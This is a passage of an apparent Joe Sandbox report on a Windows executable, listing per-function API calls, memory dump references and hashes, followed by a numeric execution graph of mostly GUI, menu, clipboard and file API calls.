                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$EnabledFocusLongVisible
                                        • String ID:
                                        • API String ID: 599048109-0
                                        • Opcode ID: cb1c87f19132670d348f43589caefb14191d0db9c4e993ae8d8c67d75e8ba143
                                        • Instruction ID: 9b191372e45709e83f1cce7d42dee75ff49b7deadfcab72b6d2fd196ff601546
                                        • Opcode Fuzzy Hash: cb1c87f19132670d348f43589caefb14191d0db9c4e993ae8d8c67d75e8ba143
                                        • Instruction Fuzzy Hash: 04F0DA752087019BE7209F36DE8CA57B7ACFB94751718843AB496E3290CB38D851CA69
                                        Function 004051A3 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongA.USER32(?,000000F0), ref: 004051AB
                                        • GetParent.USER32(?), ref: 004051C1
                                        • MapWindowPoints.USER32(00000000,00000000), ref: 004051CA
                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004051E9
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$LongMoveParentPoints
                                        • String ID:
                                        • API String ID: 473562985-0
                                        • Opcode ID: fab0eefbd949c8aa4791b99baa1f4904001a3ff5d6ae233363cc4ff1c4dfdd85
                                        • Instruction ID: 050705d4d46781d10eeea3c7f9e2e02fa34a3de8c5ebb1e511241672335786dd
                                        • Opcode Fuzzy Hash: fab0eefbd949c8aa4791b99baa1f4904001a3ff5d6ae233363cc4ff1c4dfdd85
                                        • Instruction Fuzzy Hash: 4EF07472140209BFDF019F98DD49FAA3B69FB08751F00C125BE19AA1A0C771D9619B55
                                        Function 004041CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004041F9
                                        • CreateWindowExA.USER32(?,Static,00000000,?,?,?,?,?,00000000,000000FF,00000000), ref: 00404285
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateWindowmemset
                                        • String ID: Static
                                        • API String ID: 1730425660-2272013587
                                        • Opcode ID: a183efbfaf25bebbc042af10ac3eb9652dafe14b9b7bbd77ffa2e887317b7bbd
                                        • Instruction ID: da57442342e235b20ab9d9cc299fb314f46126ddfb0dd979976cb01a117c754a
                                        • Opcode Fuzzy Hash: a183efbfaf25bebbc042af10ac3eb9652dafe14b9b7bbd77ffa2e887317b7bbd
                                        • Instruction Fuzzy Hash: D7215BB1500205AFDB115F51ED09F5B3F69EB85364F00823AFA247A2E1C3BA8921DBDC
                                        Function 004044F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040451C
                                        • CreateWindowExA.USER32(00000000,Button,?,?,?,?,?,?,?,000000FF,00000000), ref: 00404583
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateWindowmemset
                                        • String ID: Button
                                        • API String ID: 1730425660-1034594571
                                        • Opcode ID: 010baa73ad986994c1f3d44621661aa9df68acf71dbd6cab57f37a79d6a076ba
                                        • Instruction ID: c03ed1e6e3b39e81b365a7cda6e144c566f8838bc6f058065528baead89b727a
                                        • Opcode Fuzzy Hash: 010baa73ad986994c1f3d44621661aa9df68acf71dbd6cab57f37a79d6a076ba
                                        • Instruction Fuzzy Hash: DF118EB2400119BFCB119F55DE45DAB3FB8EB48358B10403AFA15B62A1D3798D20DBEC
                                        Function 00405625 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPropA.USER32(00000000,PB_ID), ref: 0040563D
                                        • GetWindowLongA.USER32(00000000,000000F4), ref: 0040564A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: LongPropWindow
                                        • String ID: PB_ID
                                        • API String ID: 2492497586-4173770792
                                        • Opcode ID: 69a740be24c28eba4c03775af690aa08edf4449696e8d17c58a7346d2cbb1dd2
                                        • Instruction ID: dcde74696da6f989fa088eeb670c0edb8cd62ec8937a9ae86c05ee9430180859
                                        • Opcode Fuzzy Hash: 69a740be24c28eba4c03775af690aa08edf4449696e8d17c58a7346d2cbb1dd2
                                        • Instruction Fuzzy Hash: C3F06232100208ABCF115F64DD08E6B7BAAEB54350B44443AFD0DB22A0C736CC61DB98
                                        Function 00404836 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: ParentProp
                                        • String ID: PB_WindowID
                                        • API String ID: 919147419-1508741625
                                        • Opcode ID: 56451676a8244703e2aa9ad7ec794e987ab7873823adb8b3af72ac0c5334d140
                                        • Instruction ID: eb09f32ff92d9ce12a6399f95510d521de9387f6d8f05edb00c370aed95cd547
                                        • Opcode Fuzzy Hash: 56451676a8244703e2aa9ad7ec794e987ab7873823adb8b3af72ac0c5334d140
                                        • Instruction Fuzzy Hash: 5CD0C2B770132167C221662A5C84E4796ACAAD8B60300C43BF701F3251C278CC0182E9

                                        Execution Graph

                                        Execution Coverage:8.6%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:1.3%
                                        Total number of Nodes:1651
                                        Total number of Limit Nodes:16
                                        execution_graph 3828 4013c1 3831 409afa 3828->3831 3830 4013cf 3832 409b06 3831->3832 3833 409b0b memcpy memcpy GetModuleHandleW DialogBoxParamW 3831->3833 3832->3830 3833->3830 3834 40bac3 3835 40bad3 3834->3835 3836 40bacc FreeLibrary 3834->3836 3836->3835 3837 405143 3838 40b9f0 3837->3838 3839 405150 memset GetDlgCtrlID GetWindowTextW 3838->3839 3840 4051f2 3839->3840 3841 405194 3839->3841 3841->3840 3842 40519d memset GetClassNameW _wcsicmp 3841->3842 3842->3840 3843 4051e5 3842->3843 3844 405019 5 API calls 3843->3844 3844->3840 3845 40a343 3846 40a353 3845->3846 3847 40a396 3845->3847 3853 40a3a3 3846->3853 3855 403e3b memset GetClassNameW _wcsicmp 3846->3855 3856 409fca 3847->3856 3849 40a39b 3869 403ffe GetSystemMetrics GetSystemMetrics 3849->3869 3852 40a360 3852->3853 3854 40a365 SetBkMode SetBkColor SetTextColor GetStockObject 3852->3854 3854->3853 3855->3852 3857 40b9f0 3856->3857 3858 409fda GetDlgItem GetDlgItem 3857->3858 3859 40a014 GetWindowRect GetWindowRect MapWindowPoints MapWindowPoints 73A1A570 3858->3859 3863 40a0bd 3859->3863 3864 40a132 3859->3864 3861 40a26f 8 API calls 3861->3849 3862 40a0dd wcslen GetTextExtentPoint32W 3862->3863 3863->3862 3863->3864 3864->3861 3876 401435 GetModuleHandleW CreateWindowExW 3864->3876 3877 401435 GetModuleHandleW CreateWindowExW 3864->3877 3867 40a1f0 _snwprintf SetWindowTextW 3868 40a239 SetWindowTextW 3867->3868 3868->3861 3868->3864 3870 404021 73A1A570 3869->3870 3871 40401d 3869->3871 3875 404037 3870->3875 3871->3870 3872 40404d GetWindowRect 3871->3872 3873 404080 MoveWindow 3872->3873 3873->3853 3875->3872 3876->3864 3877->3867 3878 4079c4 3881 4079ce 3878->3881 3882 4079e1 8 API calls 3881->3882 3883 4079cc 3881->3883 3882->3883 3884 4086c5 3885 4086e2 3884->3885 3897 40872a 3884->3897 3887 4086ee memset 3885->3887 3885->3897 3886 40873b SendMessageW 3888 408752 GetMenuStringW 3886->3888 3889 40876e 3886->3889 3892 401000 wcsncat 3887->3892 3888->3889 3890 4087d8 3889->3890 3891 408782 3889->3891 3901 4080e2 3889->3901 3898 408797 3891->3898 3908 405d3e 3891->3908 3894 408719 3892->3894 3900 4040a4 ShellExecuteW 3894->3900 3897->3886 3897->3889 3898->3890 3919 4019fb PostMessageW 3898->3919 3900->3897 3920 4027b9 SendMessageW 3901->3920 3903 408102 3907 40813e 3903->3907 3922 401410 3903->3922 3905 40814d 3905->3891 3925 4058ab SetFocus 3907->3925 3909 405d4d 3908->3909 3910 405df3 SendMessageW 3909->3910 3929 4024e9 SendMessageW 3909->3929 3910->3898 3912 405d93 3913 405dbe 3912->3913 3930 402701 SendMessageW 3912->3930 3931 4024e9 SendMessageW 3913->3931 3916 405dd8 3932 402701 SendMessageW 3916->3932 3918 405def 3918->3910 3919->3890 3921 4027d1 3920->3921 3921->3903 3926 404b45 3922->3926 3925->3905 3927 401428 DialogBoxParamW 3926->3927 3928 404b4e GetModuleHandleW 3926->3928 3927->3907 3928->3927 3929->3912 3930->3912 3931->3916 3932->3918 3933 40ba48 3936 40b6ca 3933->3936 3939 40b6a4 3936->3939 3938 40b6d3 3940 40b6b3 __dllonexit 3939->3940 3941 40b6ad _onexit 3939->3941 3940->3938 3941->3940 3942 401fcd 3943 401fda 3942->3943 3958 403992 wcslen WriteFile 3943->3958 3945 401fec memset memset memset 3946 402043 _snwprintf 3945->3946 3947 40205d 3945->3947 3946->3947 3948 402065 wcscpy 3947->3948 3949 402078 3947->3949 3948->3949 3959 40ac90 3949->3959 3955 4020c8 3956 4020d9 3955->3956 3982 406b85 ??2@YAPAXI 3955->3982 3958->3945 3960 40b9f0 3959->3960 3961 40ac9d _snwprintf 3960->3961 3986 403992 wcslen WriteFile 3961->3986 3963 402096 3964 4049df 3963->3964 3965 4049e8 3964->3965 3968 4049ed 3964->3968 3987 40493d 3965->3987 3967 4020a6 _snwprintf 3981 403992 wcslen WriteFile 3967->3981 3968->3967 3969 404a4c 3968->3969 3970 404a1d GetModuleHandleW 3968->3970 3972 404aa3 3969->3972 3973 404a56 wcscpy 3969->3973 3971 404ab6 LoadStringW 3970->3971 3975 404ac1 3971->3975 3974 404b45 GetModuleHandleW 3972->3974 3990 404ed1 memset _itow 3973->3990 3974->3971 3975->3967 3980 404ae2 memcpy 3975->3980 3978 404a78 wcslen 3978->3975 3979 404a8a GetModuleHandleW 3978->3979 3979->3971 3980->3967 3981->3955 3983 406baa 3982->3983 3998 40ae19 3983->3998 3986->3963 3988 40494a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 3987->3988 3989 4049de 3987->3989 3988->3989 3989->3968 3993 404f2d 3990->3993 3992 404a71 3992->3978 3992->3979 3994 40b9f0 3993->3994 3995 404f3a memset GetPrivateProfileStringW 3994->3995 3996 404f86 wcscpy 3995->3996 3997 404f9c 3995->3997 3996->3992 3997->3992 3999 40b9f0 3998->3999 4000 40ae26 memset memset memset 3999->4000 4001 40aea0 4000->4001 4002 40ae77 4000->4002 4003 40aee0 _snwprintf 4001->4003 4016 40abc0 _snwprintf 4001->4016 4015 40abc0 _snwprintf 4002->4015 4017 403992 wcslen WriteFile 4003->4017 4005 40ae86 _snwprintf 4005->4001 4008 40aeb5 _snwprintf wcscpy 4008->4003 4009 406bec ??3@YAXPAX 4009->3956 4010 40af24 memset 4011 40af43 _snwprintf 4010->4011 4012 40af0c 4010->4012 4013 40af66 _snwprintf 4011->4013 4012->4009 4012->4010 4012->4013 4018 403992 wcslen WriteFile 4013->4018 4015->4005 4016->4008 4017->4012 4018->4012 4019 401750 4020 409afa 4 API calls 4019->4020 4021 40175b 4020->4021 4022 4013d1 4023 4013e5 4022->4023 4024 4013dd ExitProcess 4022->4024 4033 405cd7 4035 405ce8 4033->4035 4034 405d2d 4035->4034 4036 405d25 _wcsicmp 4035->4036 4036->4034 4037 401358 4038 401364 4037->4038 4039 40138b 4038->4039 4043 404dfe 4038->4043 4044 404e0b 4043->4044 4045 404e22 memset 4044->4045 4050 401378 4044->4050 4057 404e81 4045->4057 4047 404e46 4048 404f2d 3 API calls 4047->4048 4049 404e57 4048->4049 4049->4050 4051 404e5e SetWindowTextW 4049->4051 4052 4047ef 4050->4052 4051->4050 4053 40480a ??2@YAPAXI memset memcpy 4052->4053 4054 4047f9 4052->4054 4055 404854 4053->4055 4056 40484d ??3@YAXPAX 4053->4056 4054->4053 4054->4055 4055->4039 4056->4055 4058 404e91 4057->4058 4060 404e86 _snwprintf 4057->4060 4058->4060 4061 404eaf 4058->4061 4060->4047 4062 404ec4 wcscpy 4061->4062 4063 404ed0 4061->4063 4062->4063 4063->4047 4064 4073da 4065 40b9f0 4064->4065 4066 4073e8 memset memset 4065->4066 4068 407439 4066->4068 4067 407478 4068->4067 4069 407470 _wcsicmp 4068->4069 4069->4067 4070 40845b 4071 40846f 4070->4071 4072 408492 4071->4072 4073 408482 SendMessageW 4071->4073 4104 4085a6 4071->4104 4074 4084a2 4072->4074 4075 4080e2 4 API calls 4072->4075 4073->4072 4076 4084b2 4074->4076 4117 408366 memset 4074->4117 4075->4074 4078 4084d2 4076->4078 4124 4075ff 4076->4124 4081 4084e6 4078->4081 4164 4019fb PostMessageW 4078->4164 4083 401000 wcsncat 4081->4083 4111 408538 4081->4111 4088 408508 4083->4088 4084 408550 4087 40857e 4084->4087 4089 408567 4084->4089 4171 4058b8 4084->4171 4087->4089 4090 4085b6 4087->4090 4093 4085ab 4087->4093 4091 401000 wcsncat 4088->4091 4099 4058b8 SendMessageW 4089->4099 4095 4085c3 4090->4095 4174 407fba GetTempPathW 4090->4174 4094 408518 4091->4094 4100 4058b8 SendMessageW 4093->4100 4098 401410 2 API calls 4094->4098 4097 4085e3 4095->4097 4101 4075ff 11 API calls 4095->4101 4102 4085f2 4097->4102 4188 408334 4097->4188 4103 40852d 4098->4103 4099->4104 4100->4090 4105 4085dc 4101->4105 4107 408601 4102->4107 4110 408334 25 API calls 4102->4110 4165 4058ab SetFocus 4103->4165 4109 407aaa 2 API calls 4105->4109 4112 408635 4107->4112 4193 4037b3 ??2@YAPAXI 4107->4193 4109->4097 4110->4107 4111->4084 4166 408070 memset 4111->4166 4113 408652 4112->4113 4210 405e73 4112->4210 4113->4104 4216 406ff2 4113->4216 4219 4014bf 4117->4219 4120 4083e5 4223 4058ab SetFocus 4120->4223 4123 4083f0 4123->4076 4224 405e13 4124->4224 4128 407636 4129 407646 4128->4129 4237 401907 SendMessageW 4128->4237 4130 405e13 3 API calls 4129->4130 4132 407653 4130->4132 4133 4018c0 3 API calls 4132->4133 4134 407677 4133->4134 4135 407687 4134->4135 4136 401907 2 API calls 4134->4136 4137 4018c0 3 API calls 4135->4137 4136->4135 4138 4076a3 4137->4138 4139 4076b3 4138->4139 4140 401907 2 API calls 4138->4140 4141 4018c0 3 API calls 4139->4141 4140->4139 4142 4076c5 4141->4142 4240 40589e 4142->4240 4145 4018c0 3 API calls 4146 4076e2 4145->4146 4243 403aec 4146->4243 4148 4076ff 4149 403aec 3 API calls 4148->4149 4150 407710 4149->4150 4151 40589e SendMessageW 4150->4151 4152 40771e 4151->4152 4153 4018c0 3 API calls 4152->4153 4154 40773a 4153->4154 4155 4018c0 3 API calls 4154->4155 4156 407755 4155->4156 4157 407763 4156->4157 4158 401907 2 API calls 4156->4158 4159 407aaa 4157->4159 4158->4157 4249 40739b SendMessageW 4159->4249 4161 407ac7 4162 40739b 2 API calls 4161->4162 4163 407ad8 4162->4163 4163->4078 4164->4081 4165->4111 4252 407e81 memset 4166->4252 4169 4080df 4169->4084 4344 402336 SendMessageW 4171->4344 4173 4058cf 4173->4087 4175 407fe9 GetTempFileNameW 4174->4175 4176 407fdb GetWindowsDirectoryW 4174->4176 4177 407f87 24 API calls 4175->4177 4176->4175 4178 408025 4177->4178 4179 40802a OpenClipboard 4178->4179 4180 40806e 4178->4180 4181 408049 GetLastError 4179->4181 4182 40803a 4179->4182 4180->4095 4185 408046 4181->4185 4345 403b17 EmptyClipboard 4182->4345 4184 408061 DeleteFileW 4184->4180 4185->4184 4186 4039d9 9 API calls 4185->4186 4187 408060 4186->4187 4187->4184 4189 407f87 24 API calls 4188->4189 4190 408350 4189->4190 4191 408360 4190->4191 4356 4040a4 ShellExecuteW 4190->4356 4191->4102 4194 4037cd 4193->4194 4195 4037e7 4194->4195 4196 4037de ??3@YAXPAX 4194->4196 4357 4024fd 4195->4357 4196->4195 4198 4037f3 ??2@YAPAXI memset 4199 405672 2 API calls 4198->4199 4200 403828 4199->4200 4201 403851 4200->4201 4202 40382d ??2@YAPAXI 4200->4202 4203 401410 2 API calls 4201->4203 4202->4201 4204 403879 4203->4204 4205 403897 SetFocus 4204->4205 4206 4055d7 SendMessageW 4204->4206 4207 4038b0 4205->4207 4208 4038a7 ??3@YAXPAX 4205->4208 4209 403889 InvalidateRect 4206->4209 4207->4112 4208->4207 4209->4205 4211 4024fd 2 API calls 4210->4211 4212 405e82 4211->4212 4213 405e92 SendMessageW 4212->4213 4215 405eb4 4212->4215 4213->4212 4214 405ea1 SendMessageW 4213->4214 4214->4212 4215->4113 4217 407057 4216->4217 4218 406ffd GetModuleHandleW 752419E0 4216->4218 4217->4104 4218->4104 4220 401410 2 API calls 4219->4220 4221 4014cd 4220->4221 4221->4120 4222 4019fb PostMessageW 4221->4222 4222->4120 4223->4123 4225 405e21 4224->4225 4226 405e5a SendMessageW 4224->4226 4225->4226 4228 405e26 4225->4228 4227 405e53 4226->4227 4232 4018c0 4227->4232 4246 4027d9 SendMessageW 4228->4246 4230 405e37 4230->4227 4247 4027ed SendMessageW 4230->4247 4233 4018ee 4232->4233 4234 4018ca GetMenu GetSubMenu 4232->4234 4236 4018fd EnableMenuItem 4233->4236 4234->4236 4236->4128 4238 401929 SendMessageW 4237->4238 4238->4129 4248 4027d9 SendMessageW 4240->4248 4242 4058a9 4242->4145 4244 403af4 4243->4244 4245 403af7 GetMenu GetSubMenu CheckMenuItem 4243->4245 4244->4245 4245->4148 4246->4230 4247->4230 4248->4242 4250 4073bf SendMessageW 4249->4250 4250->4161 4253 4049df 16 API calls 4252->4253 4254 407ec5 4253->4254 4255 4049df 16 API calls 4254->4255 4256 407ed6 4255->4256 4257 4049df 16 API calls 4256->4257 4258 407ee6 4257->4258 4259 4049df 16 API calls 4258->4259 4260 407ef4 4259->4260 4261 4049df 16 API calls 4260->4261 4262 407f09 4261->4262 4263 4049df 16 API calls 4262->4263 4264 407f1a 4263->4264 4265 4049df 16 API calls 4264->4265 4266 407f2a 4265->4266 4267 4049df 16 API calls 4266->4267 4268 407f3c 4267->4268 4280 4043c3 memset 4268->4280 4271 4049df 16 API calls 4272 407f5d 4271->4272 4284 404208 4272->4284 4274 407f7d 4274->4169 4275 407f87 4274->4275 4288 406d58 4275->4288 4278 407fb2 4278->4169 4281 404473 4280->4281 4282 4043f8 4280->4282 4281->4271 4283 404401 _snwprintf wcslen memcpy wcslen memcpy 4282->4283 4283->4281 4283->4283 4285 404215 4284->4285 4286 40427a 4285->4286 4287 40426a wcscpy 4285->4287 4286->4274 4287->4274 4289 405bd5 3 API calls 4288->4289 4290 406d69 4289->4290 4315 403979 CreateFileW 4290->4315 4292 406eb4 4292->4278 4309 4039d9 4292->4309 4293 406d99 4317 4038b4 LoadCursorW SetCursor 4293->4317 4294 406d71 4294->4292 4294->4293 4316 40429d WriteFile 4294->4316 4297 406e20 4299 40589e SendMessageW 4297->4299 4298 406da8 4298->4297 4300 406e15 4298->4300 4303 403992 wcslen WriteFile 4298->4303 4308 406e29 4299->4308 4318 403992 wcslen WriteFile 4300->4318 4303->4298 4305 406e7e CloseHandle 4328 4038ce SetCursor 4305->4328 4308->4305 4319 405eb9 4308->4319 4322 406d1e 4308->4322 4310 4039e6 4309->4310 4311 4039f5 4310->4311 4312 4039ed GetLastError 4310->4312 4335 4038db 4311->4335 4312->4311 4315->4294 4316->4293 4317->4298 4318->4297 4329 402374 4319->4329 4321 405ed2 4321->4308 4323 406d27 4322->4323 4324 406d3a 4322->4324 4333 4027ed SendMessageW 4323->4333 4334 40235c SendMessageW 4324->4334 4327 406d36 4327->4308 4328->4292 4332 4024c2 SendMessageW 4329->4332 4331 40238d 4331->4321 4332->4331 4333->4327 4334->4327 4336 4038f8 LoadLibraryExW 4335->4336 4337 40390f FormatMessageW 4335->4337 4336->4337 4338 40390a 4336->4338 4339 403928 wcslen 4337->4339 4340 40394d wcscpy 4337->4340 4338->4337 4342 403942 LocalFree 4339->4342 4343 403935 wcscpy 4339->4343 4341 40395c _snwprintf MessageBoxW 4340->4341 4341->4278 4342->4341 4343->4342 4344->4173 4355 403960 CreateFileW 4345->4355 4347 403b2f 4348 403b38 GetFileSize GlobalAlloc 4347->4348 4349 403ba9 GetLastError 4347->4349 4350 403b92 GetLastError 4348->4350 4351 403b5b GlobalLock ReadFile 4348->4351 4352 403bb2 CloseClipboard 4349->4352 4354 403b9b CloseHandle 4350->4354 4351->4350 4353 403b79 GlobalUnlock SetClipboardData 4351->4353 4352->4185 4353->4354 4354->4352 4355->4347 4356->4191 4360 4024e9 SendMessageW 4357->4360 4359 402506 SendMessageW 4359->4198 4360->4359 4361 407adb 4394 404cb2 4361->4394 4364 407c2b SendMessageW GetModuleHandleW LoadImageW 4365 407c89 GetModuleHandleW CreateWindowExW 4364->4365 4366 401dc8 33 API calls 4365->4366 4367 407ccb 4366->4367 4368 407d11 4367->4368 4402 4023a5 4367->4402 4405 4071b8 4368->4405 4370 407d30 GetModuleHandleW LoadIconW 4372 407d4e 4370->4372 4373 404cb2 16 API calls 4372->4373 4374 407d56 4373->4374 4375 4047a0 _wcsicmp 4374->4375 4376 407d6c 4375->4376 4377 408150 37 API calls 4376->4377 4378 407d80 4377->4378 4419 4058ab SetFocus 4378->4419 4380 407d97 4381 407dc1 wcslen wcslen 4380->4381 4420 403cf4 4380->4420 4382 407de1 4381->4382 4383 407df6 4381->4383 4385 403e17 4 API calls 4382->4385 4388 40739b 2 API calls 4383->4388 4385->4383 4387 407db5 GetTempPathW 4387->4381 4389 407e11 4388->4389 4390 407aaa 2 API calls 4389->4390 4391 407e18 RegisterClipboardFormatW 4390->4391 4392 4075ff 11 API calls 4391->4392 4393 407e31 SendMessageW SendMessageW DragAcceptFiles 4392->4393 4395 404b45 GetModuleHandleW 4394->4395 4396 404cb9 LoadMenuW 4395->4396 4397 404ccc 4396->4397 4401 404ce5 SetMenu 4396->4401 4398 404e81 2 API calls 4397->4398 4399 404cdc 4398->4399 4424 404b56 4399->4424 4401->4364 4403 4023c1 wcslen 4402->4403 4404 4023cb SendMessageW 4402->4404 4403->4404 4404->4367 4406 4071de 4405->4406 4410 40727f 4405->4410 4407 4071e6 memset memset GetWindowsDirectoryW SHGetFileInfoW 4406->4407 4408 40724f 4406->4408 4411 407270 SendMessageW 4407->4411 4408->4411 4409 4072b6 GetModuleHandleW LoadImageW GetModuleHandleW LoadImageW 4413 407315 GetSysColor 4409->4413 4410->4409 4414 4072a2 SendMessageW 4410->4414 4411->4410 4415 407334 DeleteObject DeleteObject 4413->4415 4414->4409 4435 4024e9 SendMessageW 4415->4435 4418 40736f SendMessageW 4418->4370 4419->4380 4436 403ce2 GetModuleFileNameW 4420->4436 4422 403cfa wcslen 4423 403d04 GetFileAttributesW 4422->4423 4423->4381 4423->4387 4425 40b9f0 4424->4425 4426 404b66 GetMenuItemCount 4425->4426 4427 404cab 4426->4427 4430 404b84 4426->4430 4427->4401 4428 404b89 memset GetMenuItemInfoW 4428->4430 4429 404be4 memset wcschr 4429->4430 4430->4427 4430->4428 4430->4429 4431 404ed1 5 API calls 4430->4431 4432 404b56 5 API calls 4430->4432 4433 404c55 wcscat 4430->4433 4434 404c68 ModifyMenuW 4430->4434 4431->4430 4432->4430 4433->4434 4434->4430 4435->4418 4436->4422 4440 4087df 4441 408803 4440->4441 4442 4089a5 4440->4442 4443 408942 memset DragQueryFileW DragFinish wcscpy 4441->4443 4444 408809 4441->4444 4445 4089e0 4442->4445 4446 4089b3 4442->4446 4452 4089c8 4442->4452 4483 4019fb PostMessageW 4443->4483 4447 408812 4444->4447 4448 408926 4444->4448 4485 407803 4445->4485 4451 4089b6 4446->4451 4446->4452 4454 408903 4447->4454 4455 40881b 4447->4455 4479 403a94 wcslen wcslen 4448->4479 4468 40884e 4451->4468 4484 4058ab SetFocus 4451->4484 4502 407769 4452->4502 4458 40890e PostMessageW 4454->4458 4454->4468 4459 4088d4 4455->4459 4460 408824 4455->4460 4457 4089e7 4461 4075ff 11 API calls 4457->4461 4458->4468 4464 4088e3 GetModuleHandleW LoadCursorW SetCursor 4459->4464 4459->4468 4465 408853 4460->4465 4466 408829 4460->4466 4461->4468 4462 40893b 4464->4462 4467 408862 SetBkMode SetTextColor SelectObject DrawTextExW SelectObject 4465->4467 4465->4468 4466->4468 4474 408672 GetCursorPos GetSubMenu 4466->4474 4467->4468 4468->4462 4469 408a26 4468->4469 4470 408a1d 4468->4470 4469->4462 4525 4058ab SetFocus 4469->4525 4514 407104 4470->4514 4475 405e13 3 API calls 4474->4475 4476 4086a2 4475->4476 4477 4075ff 11 API calls 4476->4477 4478 4086a8 TrackPopupMenu 4477->4478 4478->4468 4480 403abb 4479->4480 4481 403adf 4479->4481 4480->4481 4482 403ac3 _memicmp 4480->4482 4481->4468 4482->4480 4482->4481 4483->4468 4484->4468 4526 407384 SendMessageW 4485->4526 4487 40781f 4527 4038b4 LoadCursorW SetCursor 4487->4527 4489 407824 SendMessageW 4490 407851 4489->4490 4491 407769 23 API calls 4490->4491 4492 407863 4491->4492 4528 4038ce SetCursor 4492->4528 4494 407868 4529 4058ab SetFocus 4494->4529 4496 407873 4530 407384 SendMessageW 4496->4530 4498 407880 4499 40788e memset _snwprintf 4498->4499 4500 4078cf 4498->4500 4501 4078d4 SetWindowTextW 4499->4501 4500->4501 4501->4457 4503 40589e SendMessageW 4502->4503 4504 40777f 4503->4504 4505 4049df 16 API calls 4504->4505 4506 407788 _snwprintf 4505->4506 4507 405e13 3 API calls 4506->4507 4508 4077ab 4507->4508 4509 4077dc 4508->4509 4510 4049df 16 API calls 4508->4510 4511 407801 4509->4511 4512 4077e7 SendMessageW 4509->4512 4513 4077b8 _snwprintf wcscat 4510->4513 4511->4457 4512->4511 4513->4509 4515 40589e SendMessageW 4514->4515 4516 40711a 4515->4516 4531 402747 SendMessageW 4516->4531 4518 405eb9 SendMessageW 4519 40712d 4518->4519 